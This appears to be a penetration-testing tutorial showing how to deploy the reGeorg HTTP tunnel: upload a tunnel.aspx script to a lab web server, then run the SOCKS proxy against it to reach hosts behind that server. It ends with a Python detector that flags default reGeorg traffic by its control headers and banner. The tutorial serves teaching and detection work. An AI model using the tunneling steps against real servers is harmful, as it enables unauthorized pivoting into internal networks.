Lesson 98: HTTP tunneling with reGeorg, part 2
reGeorg is an extension of reDuh, the tool SensePost presented at BlackHat USA 2008. It is currently the most widely used HTTP tunnel among security practitioners, with the broadest reach and the richest platform support. In essence, once a JSP/PHP/ASP/ASPX page is uploaded to the target web server, the hosts sitting behind that server become reachable through it.
Attacker machines: 192.168.1.5 (Debian), 192.168.1.4 (Windows 7)
Target machine: 192.168.1.119 (Windows 2003)
Installation:
```
~# git clone https://github.com/sensepost/reGeorg.git
Cloning into 'reGeorg'...
remote: Enumerating objects: 85, done.
remote: Total 85 (delta 0), reused 0 (delta 0), pack-reused 85
Unpacking objects: 100% (85/85), done.
~# cd reGeorg/
~/reGeorg# ls
LICENSE.html  LICENSE.txt  README.md  reGeorgSocksProxy.py  tunnel.ashx  tunnel.aspx  tunnel.js  tunnel.jsp  tunnel.nosocket.php  tunnel.php  tunnel.tomcat.5.jsp
~/reGeorg# python reGeorgSocksProxy.py -h

                     _____
  _____   ______  __|___  |__  ______  _____   _____   ______
 |     | |   ___||   ___|    ||   ___|/     \ |     | |   ___|
 |     \ |   ___||   |  |    ||   ___||     | |     \ |   ___|
 |__|\__\|______||______|  __||______|\_____/ |__|\__\|______|
                    |_____|
                    ... every office needs a tool like Georg

  [email protected] / @trowalts
  [email protected] / @kamp_staaldraad

usage: reGeorgSocksProxy.py [-h] [-l] [-p] [-r] -u [-v]

Socks server for reGeorg HTTP(s) tunneller

optional arguments:
  -h, --help         show this help message and exit
  -l , --listen-on   The default listening address
  -p , --listen-port The default listening port
  -r , --read-buff   Local read buffer, max data to be sent per POST
  -u , --url         The url containing the tunnel script
  -v , --verbose     Verbose output[INFO|DEBUG]
```
```
~/reGeorg# pip install urllib3
Requirement already satisfied: urllib3 in /usr/lib/python2.7/dist-packages (1.24)
```
On the target machine:
The demo uses the aspx version of the tunnel script (tunnel.aspx).
On the attacker machine:
```
python reGeorgSocksProxy.py -p 8080 -l 192.168.1.5 -u http://192.168.1.119/tunnel.aspx
```
On Windows, use it together with Proxifier:
Unfortunately, most WAFs today already have signatures for the default, unmodified version of reGeorg.
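The reason the stock version is so easy to catch is that its tunnel scripts and proxy behave the same way on every deployment: the scripts from the repository listing above keep their file names, an unmodified tunnel.aspx answers a plain GET with the banner "Georg says, 'All seems fine'", the proxy drives each connection with the request headers X-CMD (CONNECT, DISCONNECT, READ, FORWARD), X-TARGET and X-PORT, and the script replies with X-STATUS and X-ERROR headers. The following is an added example, not code from this lesson or from the reGeorg project, that scans raw HTTP messages for exactly those default markers the way a WAF or IDS rule would; the sample messages are constructed for the demo and the 10.0.0.12 target inside them is made up.

```python
import re
from typing import Dict, List

# Control values the unmodified reGeorg SOCKS proxy sends in the X-CMD header.
REGEORG_CMDS = {"CONNECT", "DISCONNECT", "READ", "FORWARD"}
# Text a stock tunnel script returns to a plain GET request.
BANNER = "Georg says, 'All seems fine'"
# Script names as shipped in the repository (a weak indicator on its own).
DEFAULT_SCRIPT = re.compile(
    r"/tunnel(?:\.nosocket|\.tomcat\.5)?\.(?:aspx|ashx|jsp|php|js)(?:\?|$)", re.I)

# Constructed sample traffic for the demo (not a real capture).
SAMPLES = [
    # 0: proxy opening a tunnel through the script to an internal host
    "POST /tunnel.aspx HTTP/1.1\r\nHost: 192.168.1.119\r\nX-CMD: CONNECT\r\n"
    "X-TARGET: 10.0.0.12\r\nX-PORT: 3389\r\nContent-Length: 0\r\n\r\n",
    # 1: the script acknowledging that request
    "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\nX-STATUS: OK\r\n\r\n",
    # 2: a bare GET to the script name (path only, no control headers)
    "GET /tunnel.aspx HTTP/1.1\r\nHost: 192.168.1.119\r\n\r\n",
    # 3: the banner a stock script returns to that GET
    "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\nGeorg says, 'All seems fine'",
    # 4: ordinary traffic that must not alert
    "GET /index.aspx HTTP/1.1\r\nHost: 192.168.1.119\r\nUser-Agent: Mozilla/5.0\r\n\r\n",
]


def parse_http_message(raw: str) -> Dict[str, object]:
    """Split a raw HTTP request or response into start line, headers and body."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return {"start": lines[0], "headers": headers, "body": body}


def regeorg_indicators(raw: str) -> List[str]:
    """Return the default-reGeorg markers found in one HTTP message."""
    msg = parse_http_message(raw)
    start, hdr, body = msg["start"], msg["headers"], msg["body"]
    hits = []
    parts = start.split(" ")
    if len(parts) == 3 and not parts[0].startswith("HTTP/"):
        # Request line: look at the path and the proxy's control headers.
        if DEFAULT_SCRIPT.search(parts[1]):
            hits.append("path: default tunnel script name")
        cmd = hdr.get("x-cmd", "").upper()
        if cmd in REGEORG_CMDS:
            hits.append("header: X-CMD " + cmd)
        if cmd == "CONNECT" and "x-target" in hdr and "x-port" in hdr:
            hits.append("header: CONNECT to %s:%s" % (hdr["x-target"], hdr["x-port"]))
    else:
        # Status line: look for the banner body and the script's status headers.
        if BANNER in body:
            hits.append("body: reGeorg banner")
        if "x-status" in hdr or "x-error" in hdr:
            hits.append("header: X-STATUS/X-ERROR")
    return hits


def is_default_regeorg(raw: str) -> bool:
    """Alert on any indicator except the bare script name, which alone is too weak."""
    return any(not h.startswith("path:") for h in regeorg_indicators(raw))


def scan(messages: List[str]) -> Dict[int, List[str]]:
    """Map the index of every flagged message to the indicators that fired."""
    return {i: regeorg_indicators(m) for i, m in enumerate(messages)
            if is_default_regeorg(m)}


if __name__ == "__main__":
    for idx, hits in scan(SAMPLES).items():
        print("message %d: %s" % (idx, "; ".join(hits)))
```

Only the control headers and the banner trigger an alert; a request whose path merely ends in tunnel.aspx is reported as an indicator but not alerted on, since a renamed script defeats the path check anyway while the headers are what the proxy actually needs to function.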
Micropoor